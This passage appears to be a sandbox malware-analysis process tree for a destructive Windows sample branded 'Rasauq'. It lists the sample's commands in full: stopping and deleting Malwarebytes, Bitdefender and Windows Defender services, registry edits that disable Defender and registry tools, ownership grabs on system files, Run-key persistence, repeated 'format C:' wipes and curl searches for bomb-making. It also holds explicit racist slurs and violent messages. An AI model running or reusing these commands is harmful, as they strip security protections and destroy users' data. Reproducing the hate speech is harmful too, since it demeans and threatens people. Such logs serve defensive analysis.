      sc delete MBAMProtector
      4⤵
      Launches sc.exe
      PID:2708
  - - C:\Windows\system32\sc.exe
      sc stop MBAMChameleon
      4⤵
      Launches sc.exe
      PID:4772
  - - C:\Windows\system32\sc.exe
      sc delete MBAMChameleon
      4⤵
      PID:5096
  - - C:\Windows\system32\sc.exe
      sc stop MBAMFarflt
      4⤵
      Launches sc.exe
      PID:1676
  - - C:\Windows\system32\sc.exe
      sc delete MBAMFarflt
      4⤵
      Launches sc.exe
      PID:5828
  - - C:\Windows\system32\sc.exe
      sc stop MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:4656
  - - C:\Windows\system32\sc.exe
      sc delete MBAMSwissArmy
      4⤵
      Launches sc.exe
      PID:5436
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:5816
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Malwarebytes" /f
      4⤵
      PID:5844
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMService" /f
      4⤵
      PID:3160
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMChameleon" /f
      4⤵
      PID:1712
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMFarflt" /f
      4⤵
      PID:3836
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MBAMSwissArmy" /f
      4⤵
      PID:5468
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdservicehost.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6108
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdagent.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:672
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdredline.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5608
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdparentalservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:6024
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdreinit.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3276
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM bdsubwiz.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:124
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM seccenter.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4004
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM vsserv.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:244
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM epssecurityservice.exe /T
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:980
  - - C:\Windows\system32\sc.exe
      sc stop bdservicehost
      4⤵
      PID:6004
  - - C:\Windows\system32\sc.exe
      sc delete bdservicehost
      4⤵
      Launches sc.exe
      PID:1860
  - - C:\Windows\system32\sc.exe
      sc stop bdagent
      4⤵
      Launches sc.exe
      PID:336
  - - C:\Windows\system32\sc.exe
      sc delete bdagent
      4⤵
      Launches sc.exe
      PID:4452
  - - C:\Windows\system32\sc.exe
      sc stop bdredline
      4⤵
      Launches sc.exe
      PID:3180
  - - C:\Windows\system32\sc.exe
      sc delete bdredline
      4⤵
      Launches sc.exe
      PID:2780
  - - C:\Windows\system32\sc.exe
      sc stop bdparentalservice
      4⤵
      Launches sc.exe
      PID:4680
  - - C:\Windows\system32\sc.exe
      sc delete bdparentalservice
      4⤵
      Launches sc.exe
      PID:4400
  - - C:\Windows\system32\sc.exe
      sc stop bdreinit
      4⤵
      Launches sc.exe
      PID:4284
  - - C:\Windows\system32\sc.exe
      sc delete bdreinit
      4⤵
      PID:5240
  - - C:\Windows\system32\sc.exe
      sc stop bdsubwiz
      4⤵
      Launches sc.exe
      PID:2380
  - - C:\Windows\system32\sc.exe
      sc delete bdsubwiz
      4⤵
      Launches sc.exe
      PID:1028
  - - C:\Windows\system32\sc.exe
      sc stop seccenter
      4⤵
      Launches sc.exe
      PID:948
  - - C:\Windows\system32\sc.exe
      sc delete seccenter
      4⤵
      Launches sc.exe
      PID:3808
  - - C:\Windows\system32\sc.exe
      sc stop vsserv
      4⤵
      Launches sc.exe
      PID:4692
  - - C:\Windows\system32\sc.exe
      sc delete vsserv
      4⤵
      Launches sc.exe
      PID:5076
  - - C:\Windows\system32\sc.exe
      sc stop epssecurityservice
      4⤵
      Launches sc.exe
      PID:2184
  - - C:\Windows\system32\sc.exe
      sc delete epssecurityservice
      4⤵
      Launches sc.exe
      PID:3920
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Bitdefender" /f
      4⤵
      PID:4496
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_CURRENT_USER\SOFTWARE\Bitdefender" /f
      4⤵
      PID:6032
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdservicehost" /f
      4⤵
      PID:3900
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdagent" /f
      4⤵
      PID:3680
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdredline" /f
      4⤵
      PID:3476
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdparentalservice" /f
      4⤵
      PID:2848
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdreinit" /f
      4⤵
      PID:3764
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\bdsubwiz" /f
      4⤵
      PID:3648
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seccenter" /f
      4⤵
      PID:4432
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\vsserv" /f
      4⤵
      PID:5344
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\epssecurityservice" /f
      4⤵
      PID:5144
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
      4⤵
      Modifies Windows Defender DisableAntiSpyware settings
      PID:4752
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:3628
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1 /f
      4⤵
      PID:5776
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableOnAccessProtection" /t REG_DWORD /d 1 /f
      4⤵
      PID:2740
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f
      4⤵
      PID:1960
  - - C:\Windows\system32\sc.exe
      sc stop WinDefend
      4⤵
      Launches sc.exe
      PID:1492
  - - C:\Windows\system32\sc.exe
      sc delete WinDefend
      4⤵
      Launches sc.exe
      PID:4756
  - - C:\Windows\system32\sc.exe
      sc stop SecurityHealthService
      4⤵
      Launches sc.exe
      PID:2128
  - - C:\Windows\system32\sc.exe
      sc delete SecurityHealthService
      4⤵
      Launches sc.exe
      PID:2072
  - - C:\Windows\system32\sc.exe
      sc stop Sense
      4⤵
      PID:5576
  - - C:\Windows\system32\sc.exe
      sc delete Sense
      4⤵
      Launches sc.exe
      PID:580
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MsMpEng.exe /T
      4⤵
      Kills process with taskkill
      PID:4168
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM MpCmdRun.exe /T
      4⤵
      Kills process with taskkill
      PID:5720
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SecurityHealthSystray.exe /T
      4⤵
      Kills process with taskkill
      PID:2228
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM smartscreen.exe /T
      4⤵
      Kills process with taskkill
      PID:4688
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2212
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5440
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Program Files\Windows Defender" /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1076
  - - C:\Windows\system32\icacls.exe
      icacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2196
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f
      4⤵
      PID:4036
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f
      4⤵
      PID:4696
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f
      4⤵
      PID:5488
  - - C:\Windows\system32\reg.exe
      reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f
      4⤵
      PID:4324
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\notepad.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2824
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3860
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\calc.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3560
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1392
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:916
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4236
  - - C:\Windows\system32\powercfg.exe
      powercfg /hibernate off REM Disables hibernation
      4⤵
      Power Settings
      PID:1748
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in
      4⤵
      Power Settings
      PID:5424
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-dc 0 REM Prevents sleep on battery
      4⤵
      Power Settings
      PID:3220
  - - C:\Windows\system32\powercfg.exe
      powercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in
      4⤵
      Power Settings
      PID:5544
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "Device Name"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:1204
  - - C:\Windows\system32\powercfg.exe
      powercfg /devicedisablewake "USB Root Hub"
      4⤵
      Power Settings
      Checks SCSI registry key(s)
      PID:3832
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f
      4⤵
      Adds Run key to start application
      PID:4172
  - - C:\Windows\system32\reg.exe
      reg add "HKCR\behead all niggers" /f
      4⤵
      Modifies registry class
      PID:3808
  - - C:\Windows\system32\reg.exe
      reg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f
      4⤵
      PID:3612
  - - C:\Windows\system32\reg.exe
      reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"
      4⤵
      PID:4420
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f
      4⤵
      Adds Run key to start application
      PID:3720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k
      4⤵
      PID:4428
    - - C:\Windows\system32\reg.exe
        
        reg query "HKU" /s /f "Software" /k
        5⤵
        
        PID:5860
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f
      4⤵
      PID:3812
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3112
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5128
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5204
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5832
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\.DEFAULT\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5916
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4940
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4280
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2268
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2448
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:2672
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-19\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:2156
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Rasauq on top" /f
      4⤵
      PID:4948
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:4628
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:1520
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:5360
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:3052
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f
      4⤵
      PID:3584
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:3496
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-20\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:2068
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Rasauq on top" /f
      4⤵
      PID:5872
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Rasauq on top" /f
      4⤵
      PID:4168
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\AppDataLow\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:1964
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:5284
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Software\Rasauq on top" /f
      4⤵
      PID:4536
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f
      4⤵
      PID:6008
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:1848
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:3420
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:2132
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4764
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:5732
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:3140
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-21-3920535620-1286624088-2946613906-1000_Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      Modifies registry class
      PID:4648
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f
      4⤵
      Modifies data under HKEY_USERS
      PID:5604
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f
      4⤵
      PID:5828
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:4688
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      PID:4504
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top" /f
      4⤵
      Manipulates Digital Signatures
      Modifies data under HKEY_USERS
      PID:1620
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_USERS\S-1-5-18\Software\Software\Software\Rasauq on top" /f
      4⤵
      PID:5980
  - - C:\Windows\system32\reg.exe
      reg add "End of search: 39 match(es) found.\Software\Rasauq on top" /f
      4⤵
      PID:544
  - - C:\Windows\system32\msg.exe
      msg * /time:3 "This machine has been compromised by Rasuaq"
      4⤵
      PID:3728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=1742467040071
      4⤵
      PID:5468
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4828
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
      4⤵
      PID:5980
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:1928
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1756
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2972
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2496
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:668
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:72
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:896
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:4152
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5776
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3608
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2272
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3660
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1704
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:3504
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:2304
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3272
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:5424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4508
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3756
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3732
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5464
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2464
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:4900
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:1520
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:4100
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2280
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2132
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2304
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5004
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5432
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:72
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:4212
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3688
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
      4⤵
      PID:2976
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5432
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6068
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3612
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3328
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4660
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4100
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+make+a+bomb"
      4⤵
      PID:5488
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=where+to+buy+gunpowder"
      4⤵
      PID:3496
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=how+to+sneak+anything+onto+a+plane"
      4⤵
      PID:3220
  - - C:\Windows\system32\format.com
      format C: /fs:NTFS /q /y
